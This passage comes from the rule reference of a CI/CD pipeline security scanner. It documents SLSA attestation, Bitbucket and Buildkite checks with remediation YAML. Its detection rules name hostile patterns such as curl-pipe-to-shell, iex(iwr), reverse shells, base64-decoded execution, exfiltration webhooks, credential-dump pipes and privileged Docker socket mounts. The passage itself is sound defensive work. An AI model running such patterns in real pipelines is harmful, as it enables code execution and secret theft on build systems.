  • the URI doesn't parse as a recognizable VCS / HTTPS shape;
  • a URI is present but the corresponding digest field is missing or all-zeros (the bytes aren't actually pinned).

Recommendation. Ensure the build emits SLSA provenance with a concrete source-repo URI plus a commit-level digest. For SLSA v0.2 that's predicate.invocation.configSource.uri + configSource.digest (typically sha1 for git refs). For SLSA v1, predicate.buildDefinition.externalParameters should name the workflow's source repository, and predicate.buildDefinition.resolvedDependencies should include the same source pinned by digest. A missing or placeholder URI ('', 'unknown', 'n/a') leaves consumers unable to confirm what code produced the image.
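
A v0.2 configSource block that passes, as a sketch (URI and digest values are illustrative):

```json
{
  "predicate": {
    "invocation": {
      "configSource": {
        "uri": "git+https://github.com/example-org/app@refs/tags/v1.2.3",
        "digest": { "sha1": "0a1b2c3d4e5f60718293a4b5c6d7e8f901234567" },
        "entryPoint": ".github/workflows/build.yml"
      }
    }
  }
}
```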

Known false positives.

  • Some SLSA Phase-0 attestations omit the digest field on purpose: the build was reproducible-by-source rather than pinned to a commit. Suppress via ignore-file when the team has documented this trade-off; the default expectation for any image promoted to a production registry is a concrete commit pin.
  • Builders that emit free-form externalParameters shapes (some self-hosted SLSA implementations) may carry the source URI under a non-canonical key. The rule walks every string value in externalParameters looking for a VCS URI; if none is found, the finding fires. Add the builder to a future allowlist override (deferred) when the shape is intentional.

Seen in the wild.

  • SLSA threat-model v1.0, Source-track Threat #4 ('Build uses unauthorized source'): a builder pulling code from a fork or a different ref than the operator believes produces an attestation that signs the wrong bytes.
  • SolarWinds Orion compromise (December 2020): the build system pulled tampered source from an unauthorized branch via SUNSPOT, producing 'authentic' signed builds for code the development team never wrote. A pinned, verified source-repo claim is the control SLSA L2+ requires specifically to detect this shape.

Source: ATTEST-002 in the OCI manifest provider.

ATTEST-003: SBOM contains floating-version dependencies MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. ATTEST-001 verifies the builder; ATTEST-002 verifies the source; ATTEST-003 verifies the contents of what was shipped. A signed SBOM that declares openssl version latest is worse than no SBOM: the signature gives the rot a stamp of approval. Vulnerability-scanning tooling that reads the SBOM produces false negatives because the version it queries CVE databases for is unstable.

Detection walks every SBOM attestation (predicate types starting with https://spdx.dev/Document or https://cyclonedx.org/bom) and checks each declared package's version field against a floating-shape regex. A package is considered pinned when its version matches a concrete release identifier (semver, calver, sha-style digest, or any git tag with at least one numeric component).

Recommendation. Pin every dependency in the SBOM to a concrete version (a released semver, a digest, or a tag-plus-commit pair). Floating values like latest, *, master, an empty string, or a bare major like v1 defeat the SBOM's purpose: a consumer can't reproduce or vulnerability-scan what they don't have a fixed version of. SPDX 2.x carries version under packages[*].versionInfo; CycloneDX uses components[*].version. Both fields are optional in the spec but operationally required for any meaningful SBOM consumption.

Known false positives.

  • Some SBOM emitters legitimately leave versionInfo empty for system-injected components the build couldn't resolve (e.g. glibc from the base image when the image was built without distro metadata). Suppress via ignore-file scoped to the manifest path when the SBOM was produced in a context that intentionally elides those entries; for production-bound images the expectation is full version coverage.
  • Source-only components (a Git repo bundled into a builder stage) sometimes carry the branch name in version. Long-term that's still a floating reference (the branch tip moves), so the rule fires by design; switch to tag+digest pinning before suppressing.

Seen in the wild.

  • Log4Shell downstream impact (CVE-2021-44228): organizations with SBOMs at the ready could ship patches in hours; those without (or with floating-version SBOMs) spent days auditing builds to discover what they actually shipped. The log4j-core@latest shape was the worst case — the SBOM said the right name but no consumer could pin which exact bytes were in production.
  • Common SBOM-quality findings (NTIA SBOM Minimum Elements report, 2021): version completeness consistently the lowest-scoring dimension across producers. Floating versions account for the bulk of unconsumed SBOMs in vulnerability-management pipelines.

Source: ATTEST-003 in the OCI manifest provider.

BB-001: pipe: action not pinned to exact version HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Bitbucket pipes are docker-image references. Major-only (:1) or missing tags let Atlassian/the publisher swap the image contents. Full semver or sha256 digest is required.

Recommendation. Pin every pipe: to a full semver tag (e.g. atlassian/aws-s3-deploy:1.4.0) or to an immutable SHA. Floating majors like :1 can roll to new code silently.
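
Pinned pipe sketch (the bucket name is hypothetical):

```yaml
pipelines:
  default:
    - step:
        script:
          # Flagged: floating major rolls to new code silently
          # - pipe: atlassian/aws-s3-deploy:1

          # Passes: full semver pin
          - pipe: atlassian/aws-s3-deploy:1.4.0
            variables:
              S3_URL: 's3://example-bucket'
```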

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-001 in the Bitbucket provider.

BB-002: Script injection via attacker-controllable context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. $BITBUCKET_BRANCH, $BITBUCKET_TAG, and $BITBUCKET_PR_* are populated from SCM event metadata the attacker controls. Interpolating them unquoted into a shell command lets a crafted branch or tag name execute inline.

Recommendation. Always double-quote interpolations of ref-derived variables ("$BITBUCKET_BRANCH"). Avoid passing them to eval, sh -c, or unquoted command arguments.

Source: BB-002 in the Bitbucket provider.

BB-003: Variables contain literal secret values CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans definitions.variables and each step's variables: for entries whose KEY looks credential-shaped and whose VALUE is a literal string. AWS access keys are detected by value shape regardless of key name.

Recommendation. Store credentials as Repository / Deployment Variables in Bitbucket's Pipelines settings with the 'Secured' flag, and reference them by name. Prefer short-lived OIDC tokens for cloud access.
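A sketch, assuming API_TOKEN is defined as a Secured Repository Variable (the variable name and deploy.sh helper are hypothetical):

```yaml
- step:
    script:
      # fails: literal value committed to the repo (rotate if this ever shipped)
      # - export API_TOKEN=sk-live-0123...
      # passes: value lives in a Secured variable, referenced by name
      - ./scripts/deploy.sh --token "$API_TOKEN"
```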

Source: BB-003 in the Bitbucket provider.

BB-004: Deploy step missing deployment: environment gate MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A step whose name or invoked pipe matches deploy / release / publish / promote should declare a deployment: field so Bitbucket enforces deployment-scoped variables, approvals, and history.

Recommendation. Add deployment: production (or staging / test) to the step. Configure the matching environment in the repo's Deployments settings with required reviewers and secured variables.
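The passing shape, reusing the pinned pipe from BB-001 (names are illustrative):

```yaml
- step:
    name: Deploy to production
    deployment: production   # enables approvals, deployment variables, history
    script:
      - pipe: atlassian/aws-s3-deploy:1.4.0
```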

Source: BB-004 in the Bitbucket provider.

BB-005: Step has no max-time, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without max-time, the step runs until Bitbucket's 120-minute global default kills it. Explicit per-step timeouts cap blast radius and cost.

Recommendation. Add max-time: <minutes> to each step, sized to the 95th percentile of historical runtime plus margin. Bounded runs limit the blast radius of a compromised build and prevent runaway minute consumption.
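A minimal bounded step (the 20-minute figure is illustrative; size it to your own p95):

```yaml
- step:
    name: Build
    max-time: 20   # minutes; ~p95 historical runtime plus margin
    script:
      - npm ci && npm run build
```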

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-005 in the Bitbucket provider.

BB-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts can't be verified downstream. Passes when cosign / sigstore / slsa-* / notation-sign appears in the pipeline body.

Recommendation. Add a step that runs cosign sign against the built image or archive, using Bitbucket OIDC for keyless signing where possible. Publish the signature next to the artifact and verify it at deploy time.

Source: BB-006 in the Bitbucket provider.

BB-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / sbom-tool / Trivy-SBOM appears.

Recommendation. Add an SBOM step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM as a build artifact.
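One possible shape, assuming syft is available in the build image (file name is illustrative):

```yaml
- step:
    name: Generate SBOM
    script:
      - syft . -o cyclonedx-json > sbom.cdx.json
    artifacts:
      - sbom.cdx.json
```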

Source: BB-007 in the Bitbucket provider.

BB-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements BB-003 (variable-name scan). BB-008 checks every string in the pipeline against the cross-provider credential-pattern catalog, catching secrets pasted into script bodies or environment blocks.

Recommendation. Rotate the exposed credential. Move the value to a Secured Repository or Deployment Variable and reference it by name.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: BB-008 in the Bitbucket provider.

BB-009: pipe: pinned by version rather than sha256 digest LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. BB-001 fails floating tags at HIGH; BB-009 is the stricter tier. Even immutable-looking semver tags can be repointed by the registry; sha256 digests are tamper-evident.

Recommendation. Resolve each pipe to its digest (docker buildx imagetools inspect bitbucketpipelines/<name>:<ver>) and reference it via @sha256:<digest>.

Source: BB-009 in the Bitbucket provider.

BB-010: Deploy step ingests pull-request artifact unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Bitbucket steps declare artifacts on the producer and downstream steps implicitly receive them. When an unprivileged step produces an artifact and a later deployment: step consumes it without verification, attacker-controlled output flows into the privileged stage.

Recommendation. Add a verification step before the deploy step consumes the artifact: sha256sum -c artifact.sha256 against a manifest the producer signed, or cosign verify over the artifact directly. Alternatively, restrict the artifact-producing step to non-PR pipelines via branches: or custom: triggers.
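One possible shape, assuming the producer's checksum manifest is itself trusted (signed or produced outside PR reach); step names and paths are illustrative:

```yaml
- step:
    name: Build
    script:
      - make dist
      - sha256sum dist/app.tar.gz > dist/app.tar.gz.sha256
    artifacts:
      - dist/**
- step:
    name: Deploy
    deployment: production
    script:
      - sha256sum -c dist/app.tar.gz.sha256   # abort if the artifact changed
      - ./deploy.sh dist/app.tar.gz           # hypothetical deploy entrypoint
```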

Source: BB-010 in the Bitbucket provider.

BB-011: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values embedded in the pipeline file can't be rotated on a fine-grained schedule. Prefer OIDC or Bitbucket secured variables for cross-cloud access.

Recommendation. Use Bitbucket OIDC with oidc: true on the AWS pipe, or store credentials as secured Bitbucket variables rather than inline values. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the pipeline file.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-011 in the Bitbucket provider.

BB-012: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
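A hedged sketch of the download-verify-execute shape (the URL and checksum are placeholders you must supply):

```yaml
- step:
    script:
      # instead of: curl -fsSL https://example.com/install.sh | bash
      - curl -fsSLO https://example.com/install.sh
      - echo "<expected-sha256>  install.sh" | sha256sum -c -
      - bash install.sh
```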

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: BB-012 in the Bitbucket provider.

BB-013: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-013 in the Bitbucket provider.

BB-014: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a pipeline. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-014 in the Bitbucket provider.

BB-015: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: BB-015 in the Bitbucket provider.

BB-016: Self-hosted runner without ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered step writes to a well-known path; a subsequent deploy step on the same runner reads it. Detects runs-on: self.hosted without an ephemeral marker or Docker image override.

Recommendation. Use Docker-based self-hosted runners or configure runners to tear down between jobs. Add 'ephemeral' to runs-on labels or use Bitbucket's runner images that are rebuilt per-job.

Source: BB-016 in the Bitbucket provider.

BB-017: Repository token written to persistent storage CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detects patterns where Bitbucket pipeline tokens are redirected to files or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, artifacts, or cache entries.

Recommendation. Never write BITBUCKET_TOKEN or REPOSITORY_OAUTH_ACCESS_TOKEN to files or artifacts. Use the token inline in the command that needs it and let Bitbucket revoke it after the build.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-017 in the Bitbucket provider.

BB-018: Cache key derives from attacker-controllable input MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Bitbucket caches are restored by key. When the key includes a value the attacker controls (branch name, tag, PR ID), a pull-request pipeline can plant a poisoned cache entry that a subsequent default-branch build restores.

Recommendation. Build the cache key from values the attacker cannot control. Prefer keys derived by hashing lockfiles enforced by branch protection (Bitbucket's file-based key.files). Never include $BITBUCKET_BRANCH or PR-related variables in the cache key.
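With Bitbucket's file-based cache keys, a lockfile-derived key looks roughly like this (cache name and paths assume an npm project):

```yaml
definitions:
  caches:
    npm-deps:
      key:
        files:
          - package-lock.json   # key derives from lockfile content, not refs
      path: node_modules
```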

Source: BB-018 in the Bitbucket provider.

BB-019: after-script references secrets HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Bitbucket's after-script runs unconditionally after the main script block (including on failure). If the after-script references secrets or tokens, those values may leak into build logs or artifacts even when the step fails unexpectedly. This check detects secret-like variable references in after-script blocks.

Recommendation. Move secret-dependent operations into the main script: block. after-script runs even when the step fails and executes in a separate shell context, so credential exposure there is harder to audit and more likely to persist in logs.

Source: BB-019 in the Bitbucket provider.

BB-020: Full clone depth exposes complete history LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. By default Bitbucket Pipelines clone with depth: 50. Setting depth: full exposes the entire commit history, including any secrets that were committed and later removed. This check flags explicit clone: depth: full settings.

Recommendation. Set clone: depth: 1 (or a small number) in pipeline or step options to limit the amount of repository history available in the build environment. Full clones make it easier to extract secrets that were committed and later removed.
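A minimal top-level override (a per-step clone: block works the same way):

```yaml
clone:
  depth: 1   # only the tip commit reaches the build environment
```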

Source: BB-020 in the Bitbucket provider.

BB-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-021 in the Bitbucket provider.

BB-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR pipeline (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: BB-022 in the Bitbucket provider.

BB-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BB-023 in the Bitbucket provider.

BB-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Bitbucket has no native SLSA builder; self-hosted attestation via cosign attest or witness run is the usual path. Pipes like atlassian/cosign-attest (if published) would also match.

Recommendation. Add a step that runs cosign attest against a provenance.intoto.jsonl statement, or integrate the TestifySec witness run attestor. Artifact signing alone (BB-006) doesn't satisfy SLSA Build L3.

Source: BB-024 in the Bitbucket provider.

BB-025: Pipeline contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Specific indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands). Does not replace BB-014 (insecure package source) or BB-013 (insecure Docker flags): those are hygiene; this is evidence.

Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any credentials referenced from the pipeline's variable groups, and audit recent builds.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: BB-025 in the Bitbucket provider.

BB-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements BB-002 (script injection from untrusted PR context). This rule fires on intrinsically risky idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: BB-026 in the Bitbucket provider.

BB-027: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements BB-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: BB-027 in the Bitbucket provider.

BB-028: OIDC step without deployment-gated environment HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the cloud-side trust policy pins audience + subject; this rule verifies the Bitbucket-side workflow can't request a token without a deployment gate. Bitbucket's pull-requests: trigger fires for forked PRs, so OIDC reachable under it is always an unbounded blast radius.

Recommendation. Every step that sets oidc: true must also declare a deployment: (production / staging / test). Bitbucket deployments enforce manual approvals, restricted variables, and audit logs that an ungated step bypasses. Steps reached through pull-requests: should never request OIDC tokens; any forked PR can drive the role assumption.
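A sketch of the gated shape (the helper script is hypothetical):

```yaml
- step:
    name: Deploy
    oidc: true               # requests the workspace OIDC token...
    deployment: production   # ...only behind the deployment gate
    script:
      - ./scripts/assume-role-and-deploy.sh   # hypothetical helper
```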

Source: BB-028 in the Bitbucket provider.

BB-029: image: (step or service) not pinned by sha256 digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. BB-001 / BB-009 only inspect pipe: references inside script: lists. Step image: directives and definitions.services.<name>.image: define the runtime container the build executes inside (and the auxiliary containers the step talks to over the loopback network). Both surfaces ship code into the build context; a compromised service image (the postgres container, the selenium-grid container, …) can exfiltrate every secret the step touches just as easily as the step image itself. This rule reuses _primitives.image_pinning.classify so the floating-tag semantics match GHA-001 / GL-001 / JF-009 / ADO-009 / CC-003 / K8S-001.

Recommendation. Resolve every image: reference to its current digest (docker buildx imagetools inspect <ref> or crane digest <ref>) and pin via image: name@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the runtime image; the build's reproducibility invariant breaks, and a registry-side compromise lands inside CI without any local change.

Known false positives.

  • Bitbucket-vendored helper images (atlassian/ namespace) are still treated as third-party; the registry can move the tag. Pin them too rather than suppressing the rule globally.

Source: BB-029 in the Bitbucket provider.

BK-001: Buildkite plugin not pinned to an exact version HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Buildkite resolves plugin refs at agent boot. foo#v1.2.3 locks the version; foo#main / foo does not. Detection fires on bare names, branch keywords, and partial-semver pins (v4, v4.13).

Recommendation. Pin every plugin reference to an exact tag (docker-compose#v4.13.0) or a 40-char commit SHA. Bare references (docker-compose), branch refs (#main / #master), and major-only floats (#v4) resolve to whatever is current at agent start time, which lets a compromised plugin release execute inside the pipeline.
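The passing shape, using the docker-compose plugin version the text cites (plugin config is illustrative):

```yaml
steps:
  - label: "build"
    plugins:
      # floating, fails BK-001:  docker-compose#main
      - docker-compose#v4.13.0:   # exact tag; a 40-char commit SHA is stronger still
          run: app
```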

Source: BK-001 in the Buildkite provider.

BK-002: Literal secret value in pipeline env block CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. Detection fires on values that look like AWS access keys, GitHub PATs, OpenAI keys, JWTs, or generic high-entropy tokens, plus on env-var names that imply a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) when the value is a non-empty literal rather than an interpolation ($SECRET_FROM_AGENT_HOOK).

Recommendation. Move the value out of the pipeline file. Use Buildkite's agent secrets hooks (secrets/ directory or BUILDKITE_PLUGIN_AWS_SSM_*), the aws-ssm / vault-secrets plugins, or the BUILDKITE_PIPELINE_DEFAULT_BRANCH env var pulled from a secret manager. The pipeline.yml is committed to the repo and visible to anyone with read access.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-002 in the Buildkite provider.

BK-003: Untrusted Buildkite variable interpolated in command HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Buildkite passes branch / tag / message metadata as environment variables. Putting them inside $(...) or shelling out with the value unquoted is a classic command-injection vector. The detection fires on the unquoted interpolation form and on use inside eval / $(...).

Recommendation. Don't interpolate $BUILDKITE_BRANCH, $BUILDKITE_TAG, $BUILDKITE_MESSAGE, $BUILDKITE_PULL_REQUEST_*, or $BUILDKITE_BUILD_AUTHOR* directly into shell commands. These come from the pull request / branch and are attacker-controllable. Quote them and assign to a local variable first (branch="$BUILDKITE_BRANCH"; ./script --branch "$branch"), or pass them as arguments to a script you own.
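A sketch of the quote-and-assign pattern (the notify.sh script is hypothetical):

```yaml
steps:
  - label: "notify"
    command: |
      branch="$BUILDKITE_BRANCH"              # quote once, assign to a local
      ./scripts/notify.sh --branch "$branch"  # pass as an argument to a script you own
```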

Source: BK-003 in the Buildkite provider.

BK-004: Remote script piped into shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-3 Dependency Chain Abuse.

How this is detected. The detection fires on curl|bash, curl|sh, wget|bash, iex (iwr ...), and the corresponding Invoke-WebRequest|Invoke-Expression PowerShell forms. Use curl -fsSLO <url>; sha256sum -c install.sh.sha256; bash install.sh instead.

Recommendation. Download the installer to disk, verify a checksum or signature, then execute it. curl ... | sh lets the remote host change what runs in your pipeline at any time, and any TLS / DNS error during download silently feeds a partial script to the shell.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-004 in the Buildkite provider.

BK-005: Container started with --privileged or host-bind escalation HIGH 🔧 fix

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Detection fires on --privileged, --cap-add=SYS_ADMIN, --pid=host / --ipc=host / --userns=host, and explicit mounts of the host Docker socket (/var/run/docker.sock).

Recommendation. Drop --privileged, --cap-add=SYS_ADMIN, --pid=host, and -v /var/run/docker.sock from container invocations. If the workload needs Docker-in-Docker, use a build-specific rootless option (buildx, kaniko, buildah --isolation=chroot) instead of opening the host kernel and the agent's Docker socket to the build script.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: BK-005 in the Buildkite provider.

BK-006: Step has no timeout_in_minutes LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Buildkite has no implicit timeout; agents will wait forever. Set timeout_in_minutes: per step. The pipeline-level default counts: a global steps: block with timeout_in_minutes: is fine, since Buildkite copies it to each step.

Recommendation. Set timeout_in_minutes: on every command step. A compromised dependency or a hung test can otherwise hold an agent indefinitely, blocking parallel pipelines and running up self-hosted-runner cost. Pick a value generous enough for the slowest legitimate run (e.g. 30 for a typical build, 90 for an integration suite).
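A minimal bounded step (the 30-minute figure is illustrative):

```yaml
steps:
  - label: "tests"
    command: make test
    timeout_in_minutes: 30   # generous margin over the slowest legitimate run
```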

Known false positives.

  • Steps that genuinely need >24h (rare: database migrations, ML training jobs) should set timeout_in_minutes: 1440 explicitly, so the long limit is visibly intentional rather than a missing timeout.

Source: BK-006 in the Buildkite provider.

BK-007: Deploy step not gated by a manual block / input MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-7 Insecure System Configuration.

How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship, release, promote, apply, rollout, terraform apply, kubectl apply, helm upgrade, aws ecs update-service). The check passes when at least one preceding step in the same pipeline file is a block: or input: flow-control step.

Recommendation. Insert a - block: "Deploy?" (or - input: step) in front of every deploy step. Buildkite waits for a human to click Unblock before the gated steps run, which prevents an unreviewed merge from auto-deploying to production. Combine with branches: main so the gate only appears on release branches.
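A minimal gated sequence (commands are illustrative):

```yaml
steps:
  - label: "build"
    command: make build
  - block: "Deploy?"               # waits for a human to click Unblock
  - label: "deploy"
    command: ./scripts/deploy.sh   # hypothetical deploy entrypoint
```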

Known false positives.

  • Pipelines where the deploy gate lives in a triggered pipeline rather than the local file: the local pipeline looks ungated even though the actual deploy is gated downstream. Add a no-op block: to silence.

Source: BK-007 in the Buildkite provider.

BK-008: TLS verification disabled in step command MEDIUM 🔧 fix

